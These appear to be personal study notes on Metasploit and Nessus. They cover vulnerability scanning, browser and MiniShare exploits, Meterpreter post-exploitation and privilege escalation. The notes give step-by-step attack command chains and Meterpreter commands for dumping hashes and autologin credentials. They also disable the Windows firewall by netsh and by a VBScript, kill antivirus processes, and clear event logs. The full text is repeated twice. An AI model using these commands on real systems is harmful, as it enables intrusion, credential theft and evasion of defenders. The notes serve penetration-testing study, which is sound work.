Nessus Basics
Nessus is a properietary vulnerability scanner
It detects
> vulnerabilites
> misconfiguration
> default credentials on target system
> used in various compliance audits as well
===================
Learn how to use Meterpreter in Metasploit => Meterpreter Basics
Metasploit Basics => Metasploit Basisc
======================================================
To open Nesses
msfconsole -> type load nessus -> nessus_help
Connect to Nessus from our localhost for starting the scans
syntax
nessus_connect <your username>:<your Password>@localhost:8834 <ok>
Example
nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default port
Check the nessus scanning policies
Syntax
nessus policy list
Four policies of Nessus
1) External network scan -> used for scanning network vulnerabilities externally
2) Internal network scan -> used for scanning network vulnerabilities internally
3) Web App Tests -> used for scaning web application for vulnerabilities
4) PCI-DSS (Payment Card Industry-data Security Standard) audits -> used in payment card industry as the data security standard
Scanning victim machine
> have to create a new scan
syntax
nessus_scan_new <policy ID> <scan name> <target ip>
example
nessus_scan_new -2 windowssan 192.168.3.2
> checking the status
nessus_scan_status
> checking for the report list
nessus report list
> opening the report
nessus_report_hosts <report ID>
example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> when u see the severity, u r getting the total number of vulnerabilities
Classifications of the different vulnerabilities
> Sev 0 indicates high level vulnerabilities
> Sev 1 indicates medium level vulnerabilities
> Sev 2 indicates low-level vulnerabilities
> Sev 3 indicated informational vulnerabilities
Command to see all the vulnerabilities
nessus_report_hosts_ports <target IP> <report id>
example : nessus_report_hosts_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9
Report Importing In Metasploit
> Importing Nmap report via msfconsole in PostgreSQL database
save any host and save the nmap report in XML format
>> Check the database connectivity with the msfconsole
syntax : db_status
> import the Nmap report
syntax: db_import <report path name with name>
example: db_import /root/Desktop/scan.xml
>> see the host details
syntax: host <ip> <hostname on which nmap scan performed>
Example: host 192.168.11.23
you will get to know OS and Mac Address
>> check the open port and services running on those ports
syntax: services <hostname>
example: services 192.168.0.102
> Importing the report of nessus in msfconsole
syntax: db_import <report path name with file location>
example: db_import /root/Desktop/Nessus_scan.nessus
>check the vulnerabilities
syntax: vulns <ip (hostname)>
example: vulns 192.168.22.16
CLient Side Exploitation
What are Client Side Attacks ???
> The Server is the main computer that shares its resources over the network and the client which are the other computer on the network use these resources..
> There is a large arrau of attacks that may be launched against the clients
such as
> browser-based attacks
> vulnerable service exploitation
> Client OS have multiple applications such as PDF Reader, Document Reader and instant messenger
> The malicious code may exploit any form of ActiveX JAVA and Flash.. in browser
Exploits of Victim browser
> browser autopwn
msfconsole -> use auxiliary/server/browserautopwn -> show options -> set LHOST 192.168.2.23 (required field that to be filled) -> set SRVHOST 192.168.3.22 (SRVHOST means localhost address (set out local machine address)) -> set SRVPORT 80 (SRVPORT means the local port address) -> run
after type in the run it starts the exploit modules on the localhost and also it provides the malicious URL which must be given and must be clicked
-> TO check the meterpreter session that was created type in "sessions"
(getting into the computer and creating session)
-> session (shows the ID) -> session -i 1 <id> -> sysinfo
> Internet Explorer Shortcut Icon Exploit
shortcut icons that contain a malicious DLL
msfconsole -> use windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1
> Internet Explorer malicious VB script code execution exploit
msfconsole -> use exploit/windows/browser/ms10_022_ie_vbsscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
after F1 is pressed the malicios VB script will run in the browser and send a payload names calc.exe -> sessions -> sessions -i 1
POST Exploitation
Post Exploitattion basically means the phases of operation once a victim's system has been compromised by the attacker.The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes...
The concept of post exploitation has risen from this fact only as to how you can use the victim's compromised system's information; documenting it, and haing an idea of the configuration channels...
Phase of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdooring and rookits
> Pivoting to penetrate internal networks
Lets the first phase of post exploitation by gathering as much information
Type in :
sysinfo (get system info)
getpid (get process ID)
ps (get process list)
run checkvm (the victim's system is a virtual machine or not)
idletime (to check whether the victim is active or not)
run get_env (the victim's system evironment by another meterpreter script)
ipconfig (check the victim's system IP address)
route (to see the full network settings)
run getcountermeasure (for mapping the security configuration of the victim's systmem)
run getgui (enable the victim's Remote Desktop Protocol service)
run getgui -e
run gettelnet (enabling the telnet service)
run gettelnet -e
run get_local_subnets (see the local subnet of the victim's)
run hostedit (allows an attacker to add host enteries in the windows host file)
run hostedit -e 127.0.0.1 www.apple.com
run enum_logged_on_users (how many users are currently logged in)
run enum_logged_on_users -c
run get _application_list (it will show us all the installed applications)
run windows/gather/forensics/enum_drives (gathering physical drive)
run windows/gather/enum_ms_product_keys (get OS system's product key)
run windows/gather/credentials/windows_autologin (check autologin feature)
run winenum (dump some juicy information such as hashes and tokens)
cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> LS
cat hashdump.txt
run scraper
.msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt
Post Exploitation Privilege Escalation
> Post exploitation is divided into five phases
Understanding Privilege Escalation
Privilege Escalation in simple terms is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users....
Example:- Things we can do after privilege escalation are installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information
Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation
Vertical Privilege Escalation
a lower privileged user or application may access function that are reserved only for authorized or administrative users. This features is also known as privilege elevation..
Horizontal Privilege Escalation
This escalation usually happens on a horizontal scale with repect t user rights. A normal user accessing the resources reserved for another person's resources
Exploiting the vicitim's system
> we use a software name called mini-share (free file sharing software)
Commands
open msfconsole -> use ecploit/windows/http/minisgare get overflow -> show options -> set RHOST 192.168.11.203 (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the options) -> exploit ->
(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps
Privilege escalation by post exploitation
Module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.
(Meterpreter) run post/windows/escalate/getsystem
run post/windows/escalate/service_permissions
(Module exploits the existing administrative privileges to obtain a system session. If it Fails in the 1st instance, the module inpsects the existing service and looks for insecure file permissions that are vulnerable to an attack)
Different Exploit for compromising the target system
msf> exploit/windows/browser/ms10 002 aurora -> show options -> set SRVHOST 192.168.0.109 (Victim IP) -> exploit -> session -> session -i 1
Post Eploitation Cleaning Up Traces
Cleaning Tracks and trace through log deletion and staying undetected by disablig the firewall and antivirus systems
Why Firewall is important ?
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well-configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.
It decides whether it should allow the packet through the firewall or not.
A firewall is classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall
Packet Filter Firewall
These types of firewall are associated with the first three layers of the OSI Model with a little help from the transport layer as well, for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed with the help of set rules to match against.
Stateful Firewall
These are also called second-generation firewalls. These firewalls work on the states of a network connection.Throughout the state, it determines whether to allow the packet into the network or not.
Application Firewall
These are known as third-generation firewalls. Application firewalls work on application and protocols like HTTP, SMTP and SSH.They also help in detecting if an unwanted protocol is trying to bypass the firewall on an allowed port.
commands
run getcountermeasure
operational mode = Enable
-> shell -> netsh firewall show opmode
see if the firewall is enable or not
-> shell -> netsh firewall set opmode mode=disable
Disabling firewalls through VBScript
Code
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
save code .vbs extension
syntax upload <source filepath> <destination filepath>
Example upload root/Desktop/disable.vbs C:\
Goto destination and execute it
Antivirus Killing and Log Deletion
killing the processes of an antivirus with the help of post exploitation Meterpreter script known as killav
Script of killav.rb
opt/framework/msf3/scripts/killav.rb
in killav.rb the name of the antivirus must be present there then only antivirus must be stoppped..
(Meterpreter) run killav -> tasklist (to see the taskmanager process) or tasklist /svc or tasklist /svc |find/I "avg"
> TO see the property th processes that are running
sc queryex avgwd -> sc config (process name) start= disabled (disable the process which cannot be killed)
Terminating a processes
taskkill /F /IM "antivirus name*"
Clearing tracks to be SAFE
Clearing all the log
(Meterpreter) clearev
Nessus is a properietary vulnerability scanner
It detects
> vulnerabilites
> misconfiguration
> default credentials on target system
> used in various compliance audits as well
===================
Learn how to use Meterpreter in Metasploit => Meterpreter Basics
Metasploit Basics => Metasploit Basisc
======================================================
To open Nesses
msfconsole -> type load nessus -> nessus_help
Connect to Nessus from our localhost for starting the scans
syntax
nessus_connect <your username>:<your Password>@localhost:8834 <ok>
Example
nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default port
Check the nessus scanning policies
Syntax
nessus policy list
Four policies of Nessus
1) External network scan -> used for scanning network vulnerabilities externally
2) Internal network scan -> used for scanning network vulnerabilities internally
3) Web App Tests -> used for scaning web application for vulnerabilities
4) PCI-DSS (Payment Card Industry-data Security Standard) audits -> used in payment card industry as the data security standard
Scanning victim machine
> have to create a new scan
syntax
nessus_scan_new <policy ID> <scan name> <target ip>
example
nessus_scan_new -2 windowssan 192.168.3.2
> checking the status
nessus_scan_status
> checking for the report list
nessus report list
> opening the report
nessus_report_hosts <report ID>
example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> when u see the severity, u r getting the total number of vulnerabilities
Classifications of the different vulnerabilities
> Sev 0 indicates high level vulnerabilities
> Sev 1 indicates medium level vulnerabilities
> Sev 2 indicates low-level vulnerabilities
> Sev 3 indicated informational vulnerabilities
Command to see all the vulnerabilities
nessus_report_hosts_ports <target IP> <report id>
example : nessus_report_hosts_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9
Report Importing In Metasploit
> Importing Nmap report via msfconsole in PostgreSQL database
save any host and save the nmap report in XML format
>> Check the database connectivity with the msfconsole
syntax : db_status
> import the Nmap report
syntax: db_import <report path name with name>
example: db_import /root/Desktop/scan.xml
>> see the host details
syntax: host <ip> <hostname on which nmap scan performed>
Example: host 192.168.11.23
you will get to know OS and Mac Address
>> check the open port and services running on those ports
syntax: services <hostname>
example: services 192.168.0.102
> Importing the report of nessus in msfconsole
syntax: db_import <report path name with file location>
example: db_import /root/Desktop/Nessus_scan.nessus
>check the vulnerabilities
syntax: vulns <ip (hostname)>
example: vulns 192.168.22.16
CLient Side Exploitation
What are Client Side Attacks ???
> The Server is the main computer that shares its resources over the network and the client which are the other computer on the network use these resources..
> There is a large arrau of attacks that may be launched against the clients
such as
> browser-based attacks
> vulnerable service exploitation
> Client OS have multiple applications such as PDF Reader, Document Reader and instant messenger
> The malicious code may exploit any form of ActiveX JAVA and Flash.. in browser
Exploits of Victim browser
> browser autopwn
msfconsole -> use auxiliary/server/browserautopwn -> show options -> set LHOST 192.168.2.23 (required field that to be filled) -> set SRVHOST 192.168.3.22 (SRVHOST means localhost address (set out local machine address)) -> set SRVPORT 80 (SRVPORT means the local port address) -> run
after type in the run it starts the exploit modules on the localhost and also it provides the malicious URL which must be given and must be clicked
-> TO check the meterpreter session that was created type in "sessions"
(getting into the computer and creating session)
-> session (shows the ID) -> session -i 1 <id> -> sysinfo
> Internet Explorer Shortcut Icon Exploit
shortcut icons that contain a malicious DLL
msfconsole -> use windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1
> Internet Explorer malicious VB script code execution exploit
msfconsole -> use exploit/windows/browser/ms10_022_ie_vbsscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
after F1 is pressed the malicios VB script will run in the browser and send a payload names calc.exe -> sessions -> sessions -i 1
POST Exploitation
Post Exploitattion basically means the phases of operation once a victim's system has been compromised by the attacker.The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes...
The concept of post exploitation has risen from this fact only as to how you can use the victim's compromised system's information; documenting it, and haing an idea of the configuration channels...
Phase of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdooring and rookits
> Pivoting to penetrate internal networks
Lets the first phase of post exploitation by gathering as much information
Type in :
sysinfo (get system info)
getpid (get process ID)
ps (get process list)
run checkvm (the victim's system is a virtual machine or not)
idletime (to check whether the victim is active or not)
run get_env (the victim's system evironment by another meterpreter script)
ipconfig (check the victim's system IP address)
route (to see the full network settings)
run getcountermeasure (for mapping the security configuration of the victim's systmem)
run getgui (enable the victim's Remote Desktop Protocol service)
run getgui -e
run gettelnet (enabling the telnet service)
run gettelnet -e
run get_local_subnets (see the local subnet of the victim's)
run hostedit (allows an attacker to add host enteries in the windows host file)
run hostedit -e 127.0.0.1 www.apple.com
run enum_logged_on_users (how many users are currently logged in)
run enum_logged_on_users -c
run get _application_list (it will show us all the installed applications)
run windows/gather/forensics/enum_drives (gathering physical drive)
run windows/gather/enum_ms_product_keys (get OS system's product key)
run windows/gather/credentials/windows_autologin (check autologin feature)
run winenum (dump some juicy information such as hashes and tokens)
cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> LS
cat hashdump.txt
run scraper
.msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt
Post Exploitation Privilege Escalation
> Post exploitation is divided into five phases
Understanding Privilege Escalation
Privilege Escalation in simple terms is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users....
Example:- Things we can do after privilege escalation are installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information
Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation
Vertical Privilege Escalation
a lower privileged user or application may access function that are reserved only for authorized or administrative users. This features is also known as privilege elevation..
Horizontal Privilege Escalation
This escalation usually happens on a horizontal scale with repect t user rights. A normal user accessing the resources reserved for another person's resources
Exploiting the vicitim's system
> we use a software name called mini-share (free file sharing software)
Commands
open msfconsole -> use ecploit/windows/http/minisgare get overflow -> show options -> set RHOST 192.168.11.203 (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the options) -> exploit ->
(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps
Privilege escalation by post exploitation
Module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.
(Meterpreter) run post/windows/escalate/getsystem
run post/windows/escalate/service_permissions
(Module exploits the existing administrative privileges to obtain a system session. If it Fails in the 1st instance, the module inpsects the existing service and looks for insecure file permissions that are vulnerable to an attack)
Different Exploit for compromising the target system
msf> exploit/windows/browser/ms10 002 aurora -> show options -> set SRVHOST 192.168.0.109 (Victim IP) -> exploit -> session -> session -i 1
Post Eploitation Cleaning Up Traces
Cleaning Tracks and trace through log deletion and staying undetected by disablig the firewall and antivirus systems
Why Firewall is important ?
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well-configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.
It decides whether it should allow the packet through the firewall or not.
A firewall is classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall
Packet Filter Firewall
These types of firewall are associated with the first three layers of the OSI Model with a little help from the transport layer as well, for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed with the help of set rules to match against.
Stateful Firewall
These are also called second-generation firewalls. These firewalls work on the states of a network connection.Throughout the state, it determines whether to allow the packet into the network or not.
Application Firewall
These are known as third-generation firewalls. Application firewalls work on application and protocols like HTTP, SMTP and SSH.They also help in detecting if an unwanted protocol is trying to bypass the firewall on an allowed port.
commands
run getcountermeasure
operational mode = Enable
-> shell -> netsh firewall show opmode
see if the firewall is enable or not
-> shell -> netsh firewall set opmode mode=disable
Disabling firewalls through VBScript
Code
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
save code .vbs extension
syntax upload <source filepath> <destination filepath>
Example upload root/Desktop/disable.vbs C:\
Goto destination and execute it
Antivirus Killing and Log Deletion
killing the processes of an antivirus with the help of post exploitation Meterpreter script known as killav
Script of killav.rb
opt/framework/msf3/scripts/killav.rb
in killav.rb the name of the antivirus must be present there then only antivirus must be stoppped..
(Meterpreter) run killav -> tasklist (to see the taskmanager process) or tasklist /svc or tasklist /svc |find/I "avg"
> TO see the property th processes that are running
sc queryex avgwd -> sc config (process name) start= disabled (disable the process which cannot be killed)
Terminating a processes
taskkill /F /IM "antivirus name*"
Clearing tracks to be SAFE
Clearing all the log
(Meterpreter) clearev